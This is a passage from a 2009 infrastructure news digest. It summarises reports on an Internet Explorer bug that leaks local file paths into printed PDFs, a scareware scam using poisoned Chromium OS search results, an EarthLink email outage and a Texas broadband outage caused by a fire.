28. November 23, The Register – (International) IE bug leaks private details from 50m PDF files. A bug in Microsoft’s Internet Explorer browser is causing more than 50 million files stored online to leak potentially sensitive information that could compromise user privacy, a security researcher said. The documents stored in Adobe’s PDF format display the internal disk location where the file is stored, an oversight that can inadvertently expose real-world names and login IDs of users, the operating system being used and other information that is better kept private. The data can then be retrieved using simple web searches. Google searches such as this one expose almost four million documents residing on users’ C drives alone. Combined with searches for other common drives, the technique exposes more than 50 million files that display the local disk path, according to Inferno, a security researcher for a large software company who asked that his real name not be used. “If they have those kind of PDFs, somebody can use search engines to find out user names or do more reconnaissance on the operating systems used,” he told The Register. “That actually invades the privacy of a user.” The potentially sensitive data is included in PDFs that have been printed using Internet Explorer. The full path location is appended to its contents as soon as the Microsoft browser is used to print the document. Although the data isn’t always exposed when the document is viewed with Adobe Reader, it is easily readable when the file is opened in editors such as Notepad, and the text is also available to Google and other search engines. This PDF, for example, was stored at C:\Program Files\Wids7\WizardReport.htm at time of printing. The path makes it clear that the file was stored on a Windows machine that has software from Worldwide Instructional Design System installed. Other PDFs give up directory names that reveal authors, projects or other data that may have been designated confidential. The only way to remove the path is erase the text in an editor and save the document. Source: http://www.theregister.co.uk/2009/11/23/internet_explorer_file_disclosure_bug/


29. November 23, The Register – (International) Google hoodwinked into pushing Chrome OS scareware. Rogue anti-virus scammers have tainted search results for Chromium OS - the open source version of Google’s Chrome OS - in a bid to expose surfers hunting the web operating system to a fake anti-virus scan scam instead. Search terms such as “chromium os download” point to sites featuring scripts that redirect stray surfers towards scareware scam portals. These sites falsely report that users PCs are loaded with malware before pushing users to download a clean-up tool little or no utility. The SecureKeeper utility offered through the scam uses a series of aggressive and misleading tricks to coerce people into paying $49.95 to purchase a licence, as explained in a blog post by security firm eSoft here. Something very similar happened when Google released its Wave collaboration tool. In both cases, surfers are only redirected to scareware-punting portals in cases where they arrive as bobby-trapped URLs via Google search results. Both the Google Wave and Chromium Os scams refer to a product or service that is not yet generally available, a factor that arguably increases the potency of scams. Both attacks (like many before them) rely on black hat Search Engine Optimisation techniques. Cybercrooks typically break into well-established sites and create webpages stuffed full with relevant keywords, cross-linked to other sites doctored using the same technique. The tactic is geared towards tricking search engines into pushing manipulated URLs higher up the search engine indexes for targeted terms. Source: http://www.theregister.co.uk/2009/11/23/chromium_scareware/


30. November 23, Wall Street Journal – (International) EarthLink says email service restored. EarthLink on Monday blamed a server migration for the outages that disrupted email service for its customers over the weekend but said the problem has been solved. Many EarthLink subscribers lost email access over the weekend due to a server migration. “Some EarthLink email customers experienced a delay in receiving emails over the weekend. This issue was associated with EarthLink’s migration of our MindSpring customers to a new EarthLink email server,” a spokeswoman for the Atlanta Internet-services providers said in a statement. “EarthLink has corrected the problem and we believe all delayed emails have been delivered to our customers.” Source: http://blogs.wsj.com/digits/2009/11/23/earthlink-says-email-service-restored/


Communications Sector

31. November 24, McClatchy – (Texas) TWTC fire in Dallas blamed for Sunday Internet out. A short-circuit and fire in Dallas is being blamed for a broadband outage Sunday night that left 7,314 Windstream customers in Kerrville and the surrounding Hill Country without Internet access for about 12 hours. A division vice president for Windstream, a telecommunications company providing Internet and telephone service, said the problem was with equipment for Time Warner Telecom. In order to provide broadband service to Kerrville, Windstream uses data transport lines operated by Time Warner Telecom that connect to a central hub in Dallas. He said he was informed by Time Warner Telecom that a short-circuit in the Time Warner Telecom equipment caused a “localized fire,” which caused an outage from around 3:50 p.m. Sunday until 4:10 a.m. Monday. The outage affected customers from Kerrville to the Harper area Source: http://www.tradingmarkets.com/.site/news/Stock News/2676502/


For more stories, see item 30 above in the Information Technology Sector